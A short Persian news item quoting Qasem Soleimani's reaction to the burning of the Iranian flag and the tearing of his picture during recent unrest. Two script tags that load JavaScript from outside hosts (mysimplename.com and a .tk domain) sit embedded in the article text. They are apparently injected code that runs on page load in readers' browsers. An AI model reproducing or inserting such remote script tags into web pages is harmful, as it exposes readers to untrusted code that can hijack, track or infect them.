ای‌کاش به‌جای پرچم، من را ده بار آتش می‌زدند...


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>انتشار نخستین‌بار
واکنش سرلشکر قاسم سلیمانی نسبت به آتش زدن پرچم ایران و پاره کردن تصویر ایشان در اغتشاشات اخیر
سردار سلیمانی: گفتم ای‌کاش به‌جای پرچم، من را ده بار آتش می‌زدند ...چون ما برای نشاندن پرچم بر سر قله ده‌ها شهید دادیم تا بتوانیم این پرچم را سرافراز و برافراشته نگه داریم
<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
4

- 
0

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر